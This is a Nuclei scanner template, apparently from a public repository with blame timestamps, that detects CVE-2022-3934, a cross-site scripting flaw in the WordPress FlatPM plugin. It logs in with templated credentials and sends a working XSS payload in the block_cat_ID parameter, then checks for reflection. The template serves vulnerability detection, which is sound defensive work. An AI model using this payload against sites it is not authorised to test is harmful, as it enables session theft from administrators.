nuclei-templates/http/cves/2022/CVE-2022-3934.yaml

48 lines
1.9 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2022-3934
info:
name: WordPress FlatPM <3.0.13 - Cross-Site Scripting
2023-03-05 13:42:10 +00:00
author: r3Y3r53
severity: medium
description: |
WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 3.0.13.
2023-03-05 13:42:10 +00:00
reference:
- https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
- https://nvd.nist.gov/vuln/detail/CVE-2022-3934
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-3934
cwe-id: CWE-79
epss-score: 0.00086
epss-percentile: 0.35643
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: mehanoid
product: flat_pm
2023-09-06 11:59:08 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin,mehanoid
2023-03-05 13:42:10 +00:00
http:
2023-03-05 13:42:10 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 10s
GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
condition: and
# digest: 4b0a00483046022100a86aa711f963e0092b7e4beb28163e7e9e83d0f29af05baee37deec1ab9a53dd0221008d901eb9a565bf0183d0ccb2a4bf056fa17128e2f40a90a948301684be9b30e4:922c64590222798bb761d5b6d8e72950